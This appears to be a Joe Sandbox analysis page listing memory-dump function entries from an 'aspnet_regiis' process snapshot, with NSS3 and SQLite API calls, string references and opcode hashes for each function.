Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 5813b383d094250f465e69710d0009e4a3b390ddb51180463d43342e37711a98
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 160108B19016005BE631DE25FC40FC7B7B1EF51358F40052AE95A86710EA32F529C7D2

Function 6C452D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C455B40: PR_GetIdentitiesLayer.NSS3 ref: 6C455B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C452D9C

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

PR_EnterMonitor.NSS3(?), ref: 6C452DB2
PR_EnterMonitor.NSS3(?), ref: 6C452DCF
PR_ExitMonitor.NSS3(?), ref: 6C452DF2
PR_ExitMonitor.NSS3(?), ref: 6C452E0B

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 8d8af99cdc27821692eced05c6fdbde382f96536c35c95d012f3fffb5e098aa2
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: AB01C4B1A01600ABEA31DE25FC05FC7B7B1EF51358F40043AE95A96B11DA32F839C6D2

Function 6C3EAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C3D3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C3EAE42), ref: 6C3D30AA
Part of subcall function 6C3D3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C3D30C7
Part of subcall function 6C3D3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C3D30E5
Part of subcall function 6C3D3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C3D3116
Part of subcall function 6C3D3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C3D312B
Part of subcall function 6C3D3090: PK11_DestroyObject.NSS3(?,?), ref: 6C3D3154
Part of subcall function 6C3D3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3D317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C3C99FF,?,?,?,?,?,?,?,?,?,6C3C2D6B,?), ref: 6C3EAE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C3C99FF,?,?,?,?,?,?,?,?,?,6C3C2D6B,?), ref: 6C3EAE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C3C2D6B,?,?,00000000), ref: 6C3EAE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C3C2D6B,?,?,00000000), ref: 6C3EAE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C3C2D6B,?,?), ref: 6C3EAEA3

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 17a151876d04b15b3d4cb72367911f6d7f6004e3689de1ab503924538e5bdfc4
Instruction ID: 0a171ebd090b35289c873c5bd86cc1a6fbc9df840ffc13f3fecebc20432d2428
Opcode Fuzzy Hash: 17a151876d04b15b3d4cb72367911f6d7f6004e3689de1ab503924538e5bdfc4
Instruction Fuzzy Hash: 1101D1B7B4443057E601922CAC81AAB39A88FCB65DB090033F84AC7B01F616DD094BE3

Function 6C4D0930 Relevance: 7.5, APIs: 5, Instructions: 45fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,6C4D0C83), ref: 6C4D094F
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C4D0C83), ref: 6C4D0974
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C4D0983
_PR_MD_UNLOCK.NSS3(?,?,6C4D0C83), ref: 6C4D099F
OutputDebugStringA.KERNEL32(?,?,6C4D0C83), ref: 6C4D09B2

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
String ID:
API String ID: 1872382454-0
Opcode ID: 66a62008b8e3c19b55ef1b63ed6bef8c75284296f899608887a1ca5749ae1275
Instruction ID: e74580a78fbe533259d3a8b9efed40a8da9b163fb12c448289d34c5e79904bb5
Opcode Fuzzy Hash: 66a62008b8e3c19b55ef1b63ed6bef8c75284296f899608887a1ca5749ae1275
Instruction Fuzzy Hash: 220109B47011409FDF04AB28CC59F5B3BF9AB47619F1A0169F84587B52D73BF890CA19

Function 6C4DADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C4DA6D8), ref: 6C4DAE0D
free.MOZGLUE(?), ref: 6C4DAE14
DeleteCriticalSection.KERNEL32(6C4DA6D8), ref: 6C4DAE36
free.MOZGLUE(?), ref: 6C4DAE3D
free.MOZGLUE(00000000,00000000,?,?,6C4DA6D8), ref: 6C4DAE47

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 8bc202b80fe4a4ff645b86ec6abe9dbe06c77990e6faea5f10717dae1f5d7da2
Instruction ID: 19e6fe29ed402282eca17172980362b12cf8914fa0ae442992347a78b608eff6
Opcode Fuzzy Hash: 8bc202b80fe4a4ff645b86ec6abe9dbe06c77990e6faea5f10717dae1f5d7da2
Instruction Fuzzy Hash: 45F0C275241A02A7CA01EF68A80DD1B77B8FE86675B120338E12A87E40D732F111C7D9

Function 6C3588D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6C358990

Strings

@z6l, xrefs: 6C358A31

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: memset
String ID: @z6l
API String ID: 2221118986-774821537
Opcode ID: f28adf35024e4e1d5c3105cd161e52be16e554f81a55a7de9a6abe97b02c78fc
Instruction ID: 7b650b482c5344a86c63609c353156f16b489b7b7d7dceb0df3be11e8abb9a0d
Opcode Fuzzy Hash: f28adf35024e4e1d5c3105cd161e52be16e554f81a55a7de9a6abe97b02c78fc
Instruction Fuzzy Hash: 4551E671A157919FD704CF65C094AA6BBF0BF59308B24929DC4884BB02D332F5A5CFD2

Function 6C356C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C356D36

Strings

database corruption, xrefs: 6C356D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C356D20
%s at line %d of [%.10s], xrefs: 6C356D2F

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: fb1cb9f02a1d9c61e4fa20be80d086d99c82581759901b3ba98000edcf7ee47d
Instruction ID: d2bbd35d9613675cd2553b2a4cbfb4e417fe1f4e5a1a87bc5a6f92be22fb798d
Opcode Fuzzy Hash: fb1cb9f02a1d9c61e4fa20be80d086d99c82581759901b3ba98000edcf7ee47d
Instruction Fuzzy Hash: 1521F1316007059BC710CE19C841F5AB7F6AF85318F64892CD88A9BF51E771F959CFA2

Function 6C432FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+Cl,6C4332C2,<+Cl,00000000,00000000,?), ref: 6C432FDA

Part of subcall function 6C4214C0: TlsGetValue.KERNEL32 ref: 6C4214E0
Part of subcall function 6C4214C0: EnterCriticalSection.KERNEL32 ref: 6C4214F5
Part of subcall function 6C4214C0: PR_Unlock.NSS3 ref: 6C42150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C43300B

Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C4210F3
Part of subcall function 6C4210C0: EnterCriticalSection.KERNEL32(?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42110C
Part of subcall function 6C4210C0: PL_ArenaAllocate.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421141
Part of subcall function 6C4210C0: PR_Unlock.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421182
Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C43302A

Part of subcall function 6C420840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4208B4

Part of subcall function 6C40C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C40C45D
Part of subcall function 6C40C3D0: TlsGetValue.KERNEL32 ref: 6C40C494
Part of subcall function 6C40C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C40C4A9
Part of subcall function 6C40C3D0: PR_Unlock.NSS3(?), ref: 6C40C4F4

Strings

<+Cl, xrefs: 6C432FD0

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+Cl
API String ID: 2538134263-821100721
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: e50da494e83907d26e7ecda8baee6ea93b01c14c546abdd70e92910a7d7f8a85
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: 0011C4B6B001046BEB00CE65AC01F9B77E99F84268F184138E81CD7780E77AED16CBE1

Function 6C48CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C48CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C48CC7B), ref: 6C48CD7A
Part of subcall function 6C48CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C48CD8E
Part of subcall function 6C48CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C48CDA5
Part of subcall function 6C48CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C48CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C48CCB5
memcpy.VCRUNTIME140(6C5214F4,6C5202AC,00000090), ref: 6C48CCD3
memcpy.VCRUNTIME140(6C521588,6C5202AC,00000090), ref: 6C48CD2B

Part of subcall function 6C3A9AC0: socket.WSOCK32(?,00000017,6C3A99BE), ref: 6C3A9AE6
Part of subcall function 6C3A9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C3A99BE), ref: 6C3A9AFC

Part of subcall function 6C3B0590: closesocket.WSOCK32(6C3A9A8F,?,?,6C3A9A8F,00000000), ref: 6C3B0597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C48CCB0

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 964b249e56693eb5791d3577af97f4260510a10141496fd857186a0e37008124
Instruction ID: fd69d7bdf8971113b9446e6dc89e08a5b44f6b59eafb07675c4908f150b6724b
Opcode Fuzzy Hash: 964b249e56693eb5791d3577af97f4260510a10141496fd857186a0e37008124
Instruction Fuzzy Hash: C911AFF1B012405EDB50EF599C16F437AF8A346208F03117AE40A8BB42EB3AEC044FDA

Function 6C34A8E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6C47A480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C49C3A2,?,?,00000000,00000000), ref: 6C47A528
Part of subcall function 6C47A480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C47A6E0

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C34A94F

Strings

database corruption, xrefs: 6C34A943
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C34A939
%s at line %d of [%.10s], xrefs: 6C34A948

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: cbcf335500f0abb1174a9d76098e342e032977058060379ab7c09f008fd74dba
Instruction ID: 4615a85bd1983ba8c71185e686a6c817ab3fc941d7752b2315f0801d7c536535
Opcode Fuzzy Hash: cbcf335500f0abb1174a9d76098e342e032977058060379ab7c09f008fd74dba
Instruction Fuzzy Hash: C501D631A002089BD710CB69DC15F9BB7F9AB89308F46893DE9599BE40D771E8098FA5

Function 6C3D8850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C3E0715), ref: 6C3D8859
PR_NewLock.NSS3 ref: 6C3D8874

Part of subcall function 6C4898D0: calloc.MOZGLUE(00000001,00000084,6C3B0936,00000001,?,6C3B102C), ref: 6C4898E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C3D888D

Strings

NSS, xrefs: 6C3D8887

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: a0139efbba64ef269c7205d429cf99adf883e22ae9ff50c01de59cb0e1a98578
Instruction ID: c2d402e3af9ba00dbf8f10e4d8361428f3e241eed42ba636bbbf77861563bce9
Opcode Fuzzy Hash: a0139efbba64ef269c7205d429cf99adf883e22ae9ff50c01de59cb0e1a98578
Instruction Fuzzy Hash: D5F0F0A3E8262023F21126696C06F8724989F5179EF064031E90CE3F82EF52F5088AF3

Function 6C46A890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,?,6C455F25,?,?,?,?,?,?,?,?,?,6C45AAD4), ref: 6C46A8A3

Part of subcall function 6C40ADC0: TlsGetValue.KERNEL32(?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE10
Part of subcall function 6C40ADC0: EnterCriticalSection.KERNEL32(?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE24
Part of subcall function 6C40ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C3ED079,00000000,00000001), ref: 6C40AE5A
Part of subcall function 6C40ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE6F
Part of subcall function 6C40ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE7F
Part of subcall function 6C40ADC0: TlsGetValue.KERNEL32(?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AEB1
Part of subcall function 6C40ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AEC9

PK11_FreeSymKey.NSS3(?,00000000,?,6C455F25,?,?,?,?,?,?,?,?,?,6C45AAD4), ref: 6C46A8BA
SECITEM_ZfreeItem_Util.NSS3(%_El,00000000,00000000,?,6C455F25,?,?,?,?,?,?,?,?,?,6C45AAD4), ref: 6C46A8CF

Strings

%_El, xrefs: 6C46A894, 6C46A8CE

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
String ID: %_El
API String ID: 2877228265-407011246
Opcode ID: c8610f7e159ef6491210f1018a6a098be33db757c60a6fbe0445139342d5c2d2
Instruction ID: 0e54722851f9a4be9663191395059de529192dc0658666066c1e4807af57a21b
Opcode Fuzzy Hash: c8610f7e159ef6491210f1018a6a098be33db757c60a6fbe0445139342d5c2d2
Instruction Fuzzy Hash: 1FF0A0B2A51B2597EA10DB16EC05F9773D89F0065EF048078DC1A97F01E325F80987D1

Function 6C3BC9B0 Relevance: 6.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3 ref: 6C3BCB3D
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C3BCB4B
sqlite3_free.NSS3 ref: 6C3BCB70
sqlite3_result_error_nomem.NSS3 ref: 6C3BCB99

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintfsqlite3_result_error_nomemstrlen
String ID:
API String ID: 1052848593-0
Opcode ID: 1150d1a965ef201acffb34f1a22a3c583e857658709439dc3188eea7bb75c82e
Instruction ID: 43b83d19c3aa8fc8eb2a192bd4e5892d90e288ac656365ab3516d523d241e007
Opcode Fuzzy Hash: 1150d1a965ef201acffb34f1a22a3c583e857658709439dc3188eea7bb75c82e
Instruction Fuzzy Hash: 5E51E432608B458AD721EF34D45012BF7F4BF96798F10860DE8D56AA50EB31D495CB92

Function 6C484FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C3685D2,00000000,?,?), ref: 6C484FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C48500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4850C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4850D6

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
